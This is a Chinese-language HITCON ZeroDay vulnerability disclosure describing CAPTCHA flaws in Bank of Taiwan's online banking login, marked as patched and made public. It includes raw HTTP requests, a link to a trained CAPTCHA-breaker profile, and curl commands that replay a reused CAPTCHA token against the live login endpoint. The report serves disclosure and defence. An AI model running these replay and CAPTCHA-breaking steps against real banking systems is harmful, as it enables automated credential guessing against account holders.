Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2016-00032
- Vendor: 臺灣銀行
- Title: OO 銀行網銀多個驗證碼漏洞
- Introduction: 一個好的驗證碼機制不容易設計, 建議可參考現有的解決方案
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2016/02/02 15:57:01 : 新提交 (由 [email protected] 更新此狀態)
- 2016/02/05 03:40:34 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/02/23 00:00:00 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/04/04 21:30:11 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/04/07 10:36:19 : 複審中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/04/07 23:48:45 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2016/11/05 15:17:06 : 確認已修補 (由 HITCON ZeroDay 平台自動更新)
- 2016/11/09 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2016-00032
- 通報者:chris ([email protected])
- 風險:中
- 類型:其他 (Other)
參考資料
敘述
1 圖片識別
漏洞位置: 網路銀行 > 網路銀行登入
網頁請求:
GET /NetBank/NNBank/IISGenBMP/4192149A050B8B1034EB082F83343782/4192149A050B8B1034EB082F83343782.bmp HTTP/1.1
Host: ebank.bot.com.tw
Connection: close
網頁回應:
HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Fri, 28 Dec 2007 08:56:52 GMT
Accept-Ranges: bytes
ETag: "0e2a8962f49c81:0"
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 02 Feb 2016 07:16:18 GMT
Connection: close
Content-Length: 21654
Set-Cookie: BankOfTaiwanCookie=2852432064.20480.0000; expires=Tue, 02-Feb-2016 10:16:19 GMT; path=/
BMT<略>
測試語法:
http://www.inetsolutions.org/gsa-captcha-breaker-ultimate-tutorial-and-honest-review-seo-software-of-the-gods/
http://rghost.net/download/8lyD6Sl44/1c0bd01748b24094b1fbe0eeeb5d5d2915a31e17/2016-02-02_eBanking_-_Bank_of_Taiwan_100.gcb
2 重送攻擊
漏洞位置: 網路銀行 > 網路銀行登入
網頁請求:
POST /NetBank/NNBank/NN/NPFrnCDInq.aspx?Task=Commit HTTP/1.1
Host: ebank.bot.com.tw
Connection: close
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
tMode=&tCustPermId=A123456789&tCustLoginId=GG&tBrowser=Chrome&tImgPasswd=8216&tGenString=E9584B2F1DD57C5859CBB3809A0DA7E9&tCustVerifyCode=
網頁回應:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=big5
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=znndlrpenpkp4hct5uh53atb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 02 Feb 2016 07:29:06 GMT
Connection: close
Content-Length: 41019
Set-Cookie: BankOfTaiwanCookie=2852432064.20480.0000; expires=Tue, 02-Feb-2016 10:29:07 GMT; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>臺灣銀行個金網-網路銀行登入</title>
<略>
</head>
<略>
<body onkeydown="keydown(event)">
<!--2008.10.01 mod by eddie for firefox Start-->
<form id="Form2" name="Form2" method="post" action=""></form>
<script type="text/javascript">ITrnTm = (new Date()).getTime();
var bChkImgPasswd = "True";
function CommitTask() {
if (bChkImgPasswd == "True") {
document.getElementById('Form2').action = "../NN/NNVerify.aspx?ITrnTm=" + ITrnTm + "&ISvcType=NPFrnCDInqRq&Mode=";
document.getElementById('Form2').submit();
}
}
function CheckData() {
if (bChkImgPasswd != "True") {
alert("很抱歉!圖形驗證碼輸入錯誤,請重新輸入圖形驗證碼。");
document.getElementById('Form2').action = "../NN/NPFrnCDInq.aspx?Task=";
document.getElementById('Form2').submit();
}
}
setTimeout("CheckData()", 0);
setTimeout("CommitTask()", 300);</script>
<!--2008.10.01 mod by eddie for firefox End-->
測試語法:
curl -d "tMode=&tCustPermId=A123456789&tCustLoginId=GG&tBrowser=Chrome&tImgPasswd=0000&tGenString=E9584B2F1DD57C5859CBB3809A0DA7E9&tCustVerifyCode=" "https://ebank.bot.com.tw/NetBank/NNBank/NN/NPFrnCDInq.aspx?Task=Commit" | iconv -f "big5" -t "utf-8" | grep "var bChkImgPasswd"
curl -d "tMode=&tCustPermId=A123456789&tCustLoginId=GG&tBrowser=Chrome&tImgPasswd=8216&tGenString=E9584B2F1DD57C5859CBB3809A0DA7E9&tCustVerifyCode=" "https://ebank.bot.com.tw/NetBank/NNBank/NN/NPFrnCDInq.aspx?Task=Commit" | iconv -f "big5" -t "utf-8" | grep "var bChkImgPasswd"